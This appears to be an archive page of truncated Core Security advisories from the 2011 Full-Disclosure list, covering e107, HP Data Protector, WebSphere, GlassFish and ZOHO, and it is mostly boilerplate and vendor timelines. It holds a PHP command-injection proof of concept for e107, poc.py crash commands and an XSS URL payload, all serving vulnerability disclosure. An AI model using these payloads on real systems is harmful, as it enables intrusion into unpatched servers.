leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk65nI4ACgkQyNibggitWa3r4QCfTQBWDnGgU2zU5VIsav0W7rVi ggwAoLEFRsdGblP/tEZKyAry8BDtw4Em =EZuR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0810 - E107 CMS Script Command Injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ e107 CMS Script Command Injection 1. *Advisory Information* Title: e107 CMS Script Command Injection Advisory ID: CORE-2011-0810 Advisory URL: http://www.coresecurity.com/content/e107-cms-script-command-injection Date published: 2011-10-24 Date of last update: 2011-10-24 Vendors contacted: e107 Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1513 3. *Vulnerability Description* When the install script for e107 CMS has not been removed, an attacker can reinstall the application using arbitrary parameters. If the attacker puts a valid MySql server followed a semicolon and PHP code, this will be executed when the config file gets requested. This parameters are stored in the config file e107_config.php. 4. *Vulnerable packages* . e107 0.7.24 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* e107's team has issued patch for this issue in the revision 12375 [1] of its SVN repository. Also the development version of e107 was patched in the revision 12376 [2] 6. *Credits* This vulnerability was discovered and researched by Matt Bergin and Matias Blanco. The publication of this advisory was coordinated by Fernando Russ. 7. *Technical Description / Proof of Concept Code* A possible value for the MySql parameter could be: /- localhost:63306';system($_GET['cmd']);$a='1 - -/ Then, when the e107_config.php page is requested like this http://www.example.com/e107_config.php?cmd=id, the command id is going to be executed. 8. *Report Timeline* . 2011-10-03: Technical details sent to the Vendor. . 2011-10-03: The e107 security team asks Core for a technical description of the vulnerability. . 2011-10-03: Core sends the technical description of the vulnerability . 2011-10-21: The e107 security team reports that the vulnerability was fixed. And is now live in the SVN for wider testing. (changeset 12375 and changeset 12376) . 2011-10-21: Core provides the CVE for this vulnerability. . 2011-10-24: Advisory CORE-2011-0810 is published. 9. *References* [1] SVN reference to the patch for this issue in e107 (v0.7) http://e107.svn.sourceforge.net/viewvc/e107?view=revisionrevision=12375 [2] SVN reference to the patch for this issue in e107 (v0.8) (devel) http://e107.svn.sourceforge.net/viewvc/e107?view=revisionrevision=12376 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk6ljIgACgkQyNibggitWa113wCeISjoKNw2ab7IgWEJyvf3uU3U qIEAoJspzi1JyLPBaD9VrKUxJ2gmzr6H =UtMA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http
[Full-disclosure] CORE-2011-0106: Microsoft Publisher 2007 Pubconv.dll Memory Corruption
for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk6Vy/QACgkQyNibggitWa2TvgCgma9wKGM0AtLP5zxwjHVnUjXr P0UAn2l4X7d9JJm9JYa+lAYG1hPPYl4w =wGj/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0526 - MS WINS ECommEndDlg Input Validation Error
of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector
. *Vulnerability 6. Opcode 27.* [CVE-2011-1865] This vulnerability is reproduced with the following command: poc.py 127.0.0.1 27 1 30 3 A stack overflow is produced by calling the function swprintf from position 0x0040AD53. 8.7. *Vulnerabilidad 7. Opcode 17.* [CVE-2011-1865] This vulnerability is reproduced with the following command: poc.py 127.0.0.1 17 1 30 6 A stack overflow is produced by calling the function swprintf from position 0x0040FC05. 8.8. *Vulnerability 8. Opcode 11.* [CVE-2011-1514] This vulnerability is reproduced with the following command: poc.py 127.0.0.1 11 1 7 6 This causes a null pointer dereference. /- eax=0014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 edi= eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212 omniinet+0x7ed0: 00407ed0 8b10 mov edx,[eax] ds:0023:0014= 007cdd8c 0041143e 00156490 omniinet+0x7ed0 007cea3c 0040892b 0001 0046b9f0 omniinet+0x1143e 007cf4b8 00408f02 00156490 omniinet+0x892b 007cf518 0040a42c 7ad5f7f9 omniinet+0x8f02 007cffa0 77df352b 0001 00156498 0012e7f8 omniinet+0xa42c 007cffb4 7c80b713 00156490 0012e7f8 ADVAPI32!CryptVerifySignatureW+0x29 007cffec 77df3519 00156490 kernel32!GetModuleFileNameA+0x1b4 - -/ 8.9. *Vulnerability 9. Opcode 20.* [CVE-2011-1515] This vulnerability is reproduced with the following command: poc.py 127.0.0.1 20 1 7 6 The process terminates without generating an exception, resulting in a denial of service condition. 9. *Report Timeline* . 2011-06-02: Core Security Technologies notifies HP Security Alert team of the vulnerabilities. Publication date is temporarily set to July 5th, 2011. . 2011-06-06: Vendor acknowledges receipt. . 2011-06-06: Core sends technical details to the vendor. . 2011-06-06: Vendor confirms that a new case was assigned within HP Software Security Response Team (SSRT). . 2011-06-16: Core requests an update on this issue, in particular Core asks the vendor for a technical analysis of the bugs, a list of affected products and versions, and the vendor's plan for providing a fix (no reply received). . 2011-06-23: Core requests once more an update. . 2011-06-28: Vendor communicates that a security bulletin will be issued on the same day (June 28). The vendor confirms the vulnerabilities, and recommends as mitigation to enable encrypted communications in the cell server and client. . 2011-06-28: Core requests a link to the vendor's bulletin, and asks whether CVE ids have been assigned. . 2011-06-28: Vendor provides a link to the bulletin and CVE names for the vulnerabilities. . 2011-06-29: Advisory CORE-2011-0514 is published. 10. *References* [1] HP Data Protector http://hp.com/go/dataprotector [2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments
[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
:[ECX] 0041D180 |. 85D2 TEST EDX,EDX 0041D182 |. 74 73 JE SHORT omniinet.0041D1F7 [...] 0041D1F7 | 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C] 0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX] 0041D1FD |. 85C9 |TEST ECX,ECX 0041D1FF |. 74 26 |JE SHORT omniinet.0041D227 0041D201 |. 8B55 08|MOV EDX,DWORD PTR SS:[EBP+8] 0041D204 |. 8955 FC|MOV DWORD PTR SS:[EBP-4],EDX 0041D207 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8] 0041D20A |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C] 0041D20D |. 66:8B11|MOV DX,WORD PTR DS:[ECX] 0041D210 |. 66:8910|MOV WORD PTR DS:[EAX],DX // copy WORDs to the stack 0041D213 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8] 0041D216 |. 83C0 02|ADD EAX,2 0041D219 |. 8945 08|MOV DWORD PTR SS:[EBP+8],EAX 0041D21C |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C] 0041D21F |. 83C1 02|ADD ECX,2 0041D222 |. 894D 0C|MOV DWORD PTR SS:[EBP+C],ECX 0041D225 |.^EB D0 \JMP SHORT omniinet.0041D1F7 0041D227 | 8B55 08MOV EDX,DWORD PTR SS:[EBP+8] 0041D22A |. 66:C702 MOV WORD PTR DS:[EDX],0 0041D22F |. 8B45 FCMOV EAX,DWORD PTR SS:[EBP-4] 0041D232 |. 8BE5 MOV ESP,EBP 0041D234 |. 5D POP EBP 0041D235 \. C3 RETN - -/ 9. *Report Timeline* . 2011-06-06: Core Security Technologies notifies the HP team of the vulnerabilities and provides the technical details. Publication date is temporarily set to July 5th, 2011. . 2011-06-06: Vendor confirms that a new case was assigned within HP Software Security Response Team (SSRT). . 2011-06-16: Core requests an update on this issue, in particular Core asks the vendor for a technical analysis of the bugs, a list of affected products and versions, and the vendor's plan for providing a fix (no reply received). . 2011-06-23: Core requests once more an update. . 2011-06-28: Vendor communicates that a security bulletin will be issued on the same day (June 28). The vendor confirms the vulnerabilities, and recommends as mitigation to enable encrypted communications in the cell server and client. . 2011-06-28: Core requests a link to the vendor's bulletin, and asks whether CVE ids have been assigned. . 2011-06-28: Vendor provides a link to the bulletin and CVE names for the vulnerabilities. . 2011-06-29: Advisory CORE-2011-0606 is published. 10. *References* [1] HP Data Protector http://hp.com/go/dataprotector [2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay EAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo =zHon -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk
[Full-disclosure] CORE-2010-1021: IBM WebSphere Application Server Cross-Site Request Forgery
about its own publication process [5]. Without additional information, it is difficult for Core to understand the reason why users of vulnerable WebSphere software should remain without any solution until Q3 2011. . 2011-03-17: After 1 month of silence, the vendor informs Core that IBM's point of contact for this issue has changed, and that further communications will be handled by the head of IBM's Secure By Design initiative which includes the IBM PSIRT. . 2011-03-17: Vendor requests Core to postpone the publication of its advisory until early October 2011. . 2011-03-18: Vendor communicates that since Core hasn't responded to the request (sent the previous day) of deferring the public disclosure of this security vulnerability from 21 March to early October 2011, IBM considers that Core agrees. . 2011-03-21: Core answers that October 2011 is well beyond what it considers a reasonable timeframe to patch the type of bug that it has reported (a Cross-Site Request Forgery). Additionally the vendor didn't provide Core a technical analysis of the bug, explaining the difficulty to patch it (and why it would take IBM around 10 months to release fixes). The vendor didn't provide either the requested list of affected products and versions. According to Core's publication policy, the decision of postponing the publication of an advisory cannot be taken without technical arguments that justify that decision. This is why Core cannot agree with IBM's request to postpone publication until October 2011, unless the requested technical information is provided by the vendor. (No reply received.) . 2011-04-25: Core communicates the vendor that it has rescheduled the publication of its advisory to June 14th, 2011. That date corresponds to a 6 month timeframe after technical details about this vulnerability were sent to IBM (on December 14th, 2010), and is considered final. (No reply received.) . 2011-06-15: The advisory CORE-2010-1021 is published. 10. *References* [1] IBM WebSphere Application Server: http://www-01.ibm.com/software/webservers/appserv/was/ [2] Cross-Site Request Forgery (CSRF) http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 [3] Application Boundaries Enforcer (ABE) http://noscript.net/abe/ [4] The author participated in Core Security's Bugweek 2010 as member of the team Ex Tester fuErTes and Exploit Testers. [5] Finding bugs and publishing advisories _ the Core Security way http://corelabs.coresecurity.com/index.php?module=Wikiaction=viewtype=publicationname=Finding_bugs_and_publishing_advisories [6] IBM WebSphere Reference, Global Security settings: http://publib.boulder.ibm.com/infocenter/wasinfo/fep/topic/com.ibm.websphere.nd.multiplatform.doc/info/ae/ae/usec_secureadminappinfra.html 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk35HjUACgkQyNibggitWa167gCfXeOi6AS7D37B3KCKs6Jcj1s+ zvIAn0siKkTeoI98lg6ng54dX78N4Vwd =rWih -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk
[Full-disclosure] CORE-2011-0203 - MS HyperV Persistent DoS Vulnerability
and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web \ at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0908: Lotus Notes XLS viewer malformed BIFF record heap overflow
of Core's advisory is rescheduled for May 23rd, 2011. . 2011-04-28: Vendor replies that it will provide an update by the end of the week. . 2011-05-04: Vendor requests targeting May 24th for the publication of this vulnerability. . 2011-05-04: Core agrees to reschedule for May 24th, requests a list of vulnerable versions, and offers to include a vendor statement in its advisory. . 2011-05-19: Vendor replies that it is preparing an advisory which will outline the fixes and options available. Vendor states that this vulnerability would impact all current releases. Vendor asks whether a CVE has been assigned to the vulnerability. . 2011-05-20: Core provides the CVE name assigned to the issue, and requests additional information to be included in its advisory. . 2011-05-24: Vendor provides a link to its security alert, which includes information about fixes and workarounds. . 2011-05-24: The advisory CORE-2010-0908 is published. 10. *References* [1] Core Security Bugweek http://corelabs.coresecurity.com/index.php?module=Wikiaction=viewtype=projectname=Bugweek 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3cILkACgkQyNibggitWa1JXACfZhYfedrWImwvET8EoDXLaXT3 4UQAn1GqSKPazSFLZ15cWDD+JdkgtLif =P9PQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0204: Adobe Audition vulnerability processing malformed session file
and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg 6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d =EybH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1118: Oracle GlassFish Server Administration Console Authentication Bypass
be easily applied by every customer. . Fixes have been integrated; all the final patches should be available in July. . 2011-05-05: Core decides to release the advisory next Wednesday, May 11th; and notifies the sequence of events that has motivated that decision: . Oracle was notified of the vulnerability 5 month ago. . Oracle released a fixed version of GlassFish (March 2011) without notifying Core, without patching previous versions and without publishing any workaround for affected users. . Core has a workaround that mitigates the vulnerability. Core sends the proposed workaround [Sec. 6.1] to the Oracle Team and asks if they want to add further information in the advisory. . 2011-05-06: Oracle requests Core to hold the advisory publication until they have patches available for all customers. Oracle states that they announce security fixes on a pre-determined schedule, so users are prepared to apply them. Adhoc publication of issues may not allow every customer to monitor and apply patches in time, which increases their exposure. . 2011-05-09: Core notifies that the publication of security advisories is aimed at explaining the problem to the vulnerable user community and providing the technical details and guidance so they can devise protection countermeasures. Core usually releases this information in coordination with the vendor, but in this case this is not possible because Oracle has already released patches for some versions (without notifying Core). Currently, there is a patched version of GlassFish and there are vulnerable versions with exposed users. In this scenario, Core has decided to release the advisory as 'user 'release' next Wednesday, providing a way to mitigate the problem until patches are available. The vendor (Oracle in this case) may or may not agree with Core assessment on how to help users to reduce risk, but the vendor is certainly not the only party entitled to provide plausible solutions to the problem. . 2011-05-11: Advisory CORE-2010-1118 is published. 10. *References* [1] http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html [2] http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3LEs0ACgkQyNibggitWa0xHwCfbxae3OXevZBQsTIVTvCk8A24 NJcAniSAW+b9R/XylVhdNeqszjj7v0p/ =LfGA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
/by-nc-sa/3.0/us 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9 =oV7u -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities
-/ The example above was caused by following a link to: /- http://SERVER/EmployeeSearch.cc?actionId=Searchamp;parameterName=nameamp;searchType=containsamp;searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29 -/ This reflection is not obvious at first sight, as the source code shown after the process is finished is the showList page source. This code can be easily viewed if captured on the wire using a proxy server, though. Additionally, since invoking 'http://SERVER/EmployeeSearch.cc?actionId=Search' causes a redirection to 'http://SERVER/EmployeeSearch.cc?actionId=showList', entering any data capable of triggering a vulnerability in the latter page can be introduced in the former with the same results. It is important to note that since the cross site scripting vulnerabilities were detected while investigating the authentication bypass issues and were considered a secondary matter, the pages containing them were not thoroughly tested. This leaves the possibility of other similar cross site scripting vulnerabilities remaining undetected. 9. *Report Timeline* . 2011-01-11: Initial notification to the vendor. Publication date set to February 2nd, 2011. . 2011-01-13: The Zoho team asks Core for a technical description of the vulnerability. . 2011-01-13: Technical details sent to Zoho team by Core. . 2011-01-17: The Zoho team acknowledges reception of advisory draft and asks a contact phone number to discuss these flaws. . 2011-01-17: The Core team notifies its preference for keeping the whole communication process through email, in order to track all interactions, and involve all those interested in: 1. the Core Security Advisories Team, 2. the Zoho team and, 3. the discoverer of the vulnerability. If there is something that cannot be resolved via email, Core team can eventually send a phone number to set up a conference call, but that is not necessary at the moment. . 2011-01-20: The Zoho team notifies that the vulnerabilities highlighted in the document will be addressed in the upcoming release of ADSelfService Plus, scheduled to be released before Feb. 11th. . 2011-01-21: Core notifies that the advisory was re-scheduled to Feb. 10th, and asks if any security bulleting is going to be released by Zoho team regarding these vulnerabilities. . 2011-01-28: The Zoho team notifies that they are on schedule for the release of the new version of ADSelfService Plus. Zoho have plans to publish a report regarding these vulnerabilities, including solutions and workarounds. . 